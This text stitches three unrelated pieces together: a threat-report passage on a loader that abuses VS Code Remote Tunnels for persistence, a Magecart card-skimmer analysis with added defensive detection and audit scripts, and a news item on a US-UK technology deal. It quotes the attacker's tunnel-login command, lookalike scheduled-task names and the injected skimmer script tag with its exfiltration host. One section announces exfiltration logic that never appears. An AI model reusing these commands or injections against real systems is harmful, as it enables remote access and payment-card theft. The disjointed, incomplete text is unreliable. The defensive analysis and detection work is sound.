This loader exhibits advanced obfuscation techniques using repeated variable and function names like IIIllIIIIlIlIIlIII to evade static analysis detection methods.
The WhirlCoil component downloads the VSCode Command Line Interface from official Microsoft sources, extracts it to %LOCALAPPDATA%\Microsoft\VSCode, and establishes persistence through scheduled tasks named GoogleUpdate, GoogleUpdated, or MicrosoftHealthcareMonitorNode.
The script executes the command code.exe tunnel user login --provider github --name <COMPUTERNAME> to create GitHub-authenticated remote tunnels, providing persistent access without conventional malware signatures.
System information collection includes Windows version details, locale settings, computer identification, username, and domain information, which is transmitted via POST requests to free request logging services like requestrepo.com.
The exfiltrated data is combined with VS Code Remote Tunnel verification codes, enabling threat actors to authenticate remote sessions and execute arbitrary commands through Visual Studio Code's integrated terminal interface.
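A correlation check for the tunnel-based persistence described above, combining the weak signals the report names (code.exe tunnel invocations, the CLI dropped under %LOCALAPPDATA%\Microsoft\VSCode, the GoogleUpdate/GoogleUpdated/MicrosoftHealthcareMonitorNode task names, and POSTs to requestrepo.com) so that a developer legitimately using Remote Tunnels is not flagged on one signal alone. This is an added example, not code from Proofpoint or the original article; the events, host names and paths are constructed.

```python
from collections import defaultdict

# Constructed EDR-style events for three hosts (not real telemetry). ws-07 mirrors the
# chain described above; dev-03 is a developer using Remote Tunnels from a normal
# install; ws-12 carries only the genuine Google updater task.
EVENTS = [
    {"host": "ws-07", "type": "process",
     "image": r"C:\Users\u\AppData\Local\Microsoft\VSCode\code.exe",
     "cmdline": "code.exe tunnel user login --provider github --name WS-07"},
    {"host": "ws-07", "type": "schtask", "task_name": "GoogleUpdated",
     "action": r"C:\Users\u\AppData\Local\Microsoft\VSCode\code.exe tunnel"},
    {"host": "ws-07", "type": "netconn", "method": "POST", "dest_host": "requestrepo.com"},
    {"host": "dev-03", "type": "process",
     "image": r"C:\Program Files\Microsoft VS Code\bin\code.exe",
     "cmdline": "code.exe tunnel --name dev-03"},
    {"host": "ws-12", "type": "schtask", "task_name": "GoogleUpdateTaskMachineCore",
     "action": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c"},
]

# Task names the report attributes to the loader, compared case-insensitively.
LOOKALIKE_TASK_NAMES = {"googleupdate", "googleupdated", "microsofthealthcaremonitornode"}
# Drop location used by WhirlCoil (%LOCALAPPDATA%\Microsoft\VSCode), lower-cased.
VSCODE_USER_PATH = "\\appdata\\local\\microsoft\\vscode\\"


def signals(ev: dict) -> set[str]:
    """Map one event to the weak signals it carries; none of these alerts on its own."""
    found = set()
    if ev["type"] == "process":
        cmdline = ev["cmdline"].lower()
        if "code.exe" in cmdline and " tunnel" in cmdline:
            found.add("vscode_tunnel_cli")
        if VSCODE_USER_PATH in ev["image"].lower():
            found.add("cli_run_from_localappdata")
    elif ev["type"] == "schtask":
        if ev["task_name"].lower() in LOOKALIKE_TASK_NAMES:
            found.add("lookalike_task_name")
        if VSCODE_USER_PATH in ev["action"].lower():
            found.add("task_launches_vscode_cli")
    elif ev["type"] == "netconn":
        if ev["method"] == "POST" and ev["dest_host"].lower().endswith("requestrepo.com"):
            found.add("post_to_request_logger")
    return found


def correlate(events: list[dict], min_signals: int = 2) -> dict[str, list[str]]:
    """Alert on hosts that accumulate at least min_signals distinct signals."""
    per_host: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= signals(ev)
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= min_signals}
```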
The threat landscape for e-commerce websites has once again shifted with the emergence of a sophisticated Magecart-style attack campaign, characterized by the deployment of obfuscated JavaScript to harvest sensitive payment information.
The campaign first came to light in mid-September 2025 following a tweet indicating an ongoing skimming operation, which was later investigated in detail by cybersecurity researcher Himanshu Anand.
This new episode demonstrates the persistent ingenuity of web skimming groups leveraging client-side injection to target unsuspecting financial transactions at scale.
The attack vectors in question involve the injection of malicious JavaScript, hosted on attacker-controlled domains such as cc-analytics[.]com, into vulnerable checkout pages of compromised e-commerce platforms.
Once inserted, the script seamlessly blends into legitimate payment workflows, hooking into form fields and event listeners to silently exfiltrate payment data.
The initial code observed was heavily obfuscated, designed both to evade detection by security scanners and to frustrate analysis by incident responders.
The same code has been reused across several campaigns, with the malware logic replicated under different domain names such as getnjs[.]com, getvjs[.]com, and utilanalytics[.]com, primarily hosted on infrastructure such as the IP address 45.61.136.141.
Hosting IP extracted from URLScan transaction logs (Source – Himanshu Anand)
Cybersecurity researcher Himanshu Anand noted that passive DNS and infrastructure fingerprinting could be used to map the malware's operational reach.
By analyzing public telemetry from sources like URLScan and WHOIS records, Anand was able to map out a constellation of related domains linked to a single cluster of attacker infrastructure.
These pivots revealed more than a dozen active domains, some masquerading as legitimate analytics or utility services, each serving identical or near-identical skimmer payloads.
The Malware’s Infection Mechanism
Central to the success of this Magecart operation is its infection mechanism: a highly automated skimmer script injected via <script src="https[:]//www[.]cc-analytics[.]com/app[.]js">.
Once active, the code establishes event hooks on payment input fields, such as credit card numbers and billing addresses. When triggered, the script collects stolen credentials and promptly dispatches them to a remote server (pstatics[.]com) using XMLHttpRequest and FormData objects.
The core data exfiltration logic can be described as follows:
The design ensures that only valid, non-test credentials—those meeting certain length criteria—are transmitted, maximizing the quality and value of stolen data.
This infection pathway is further reinforced by persistent infrastructure, with attackers recycling domain patterns over time.
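A defender-side audit for the injection described above: it parses a checkout page, extracts every external script source, and flags sources that belong to the skimmer domains named in this write-up or that are not on the merchant's allowlist. This is an added example, not code from Himanshu Anand's analysis or the original article; the page, the first-party host shop.example and the CDN cdn.shop.example are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the write-up links to this skimmer cluster.
KNOWN_SKIMMER_DOMAINS = {"cc-analytics.com", "getnjs.com", "getvjs.com",
                         "utilanalytics.com", "pstatics.com"}

# Constructed checkout page (shop.example and cdn.shop.example are assumed names):
# a first-party script, an approved CDN, the injected skimmer tag, an unapproved tracker.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/vendor.js"></script>
<script src="https://www.cc-analytics.com/app.js"></script>
<script src="//tag.example-marketing.net/t.js" async></script>
</head><body><form id="payment"></form></body></html>"""

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)

def registered_domain(host: str) -> str:
    """Crude last-two-labels reduction; sufficient for the .com domains above."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()

def audit_checkout_scripts(html: str, first_party: str, allowlist: set[str]) -> list:
    """Return (src, reason) for each script the checkout page should not be loading."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        # urlparse resolves protocol-relative "//host/x.js" sources as well
        host = urlparse(src, scheme="https").netloc.lower()
        if not host:  # relative path, served first-party
            continue
        if registered_domain(host) in KNOWN_SKIMMER_DOMAINS:
            findings.append((src, "known_skimmer_domain"))
        elif host != first_party and host not in allowlist:
            findings.append((src, "unapproved_third_party"))
    return findings
```

The same allowlist can be enforced in the browser with a Content-Security-Policy script-src directive, which would have blocked both flagged sources before they executed.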
U.S. and U.K. leaders are aiming to formally sign an expansive technology partnership on Thursday as part of President Donald Trump’s state visit with U.K. leadership, according to sources familiar with the planning.
The details of the Tech Prosperity Deal, published on Tuesday, note that three emerging technologies will shape the partnership: artificial intelligence, quantum information sciences and technologies, and nuclear technology. Major U.S. companies — namely NVIDIA, Microsoft, Google, OpenAI and CoreWeave — jointly committed 31 billion British pounds to support the U.K.’s AI infrastructure.
Semiconductor chip manufacturing, quantum computer development and data center development are some of the core investments on which the partnership will focus.
“By teaming-up with world-class companies from both the UK and US, we’re laying the foundations for a future where together we are world leaders in the technology of tomorrow, creating highly skilled jobs, putting more money in people’s pockets and ensuring this partnership benefits every corner of the United Kingdom,” Prime Minister Keir Starmer said in a news release on the deal.
U.K.-based companies are also bringing their capabilities to U.S. initiatives. Oxford Quantum Circuits, a quantum computer company, has installed a quantum computer in New York City, while British semiconductor and software design company Arm Holdings will collaborate with NVIDIA on forming the latter company's Grace Blackwell chips.
Both countries will also work together to build new nuclear power stations, expedite commercial fusion solutions, and help meet the energy demand that emerging systems such as AI and quantum computing will create.
“From the UK's perspective, it gets a huge amount of investment to boost its own AI ecosystem, and really it's a massive vote of confidence for that ecosystem and the potential that it has,” Ayesha Bhatti, the head of digital policy for the UK and EU at the Center for Data Innovation, told Nextgov/FCW, adding that she, too, had been told the signing would take place Thursday.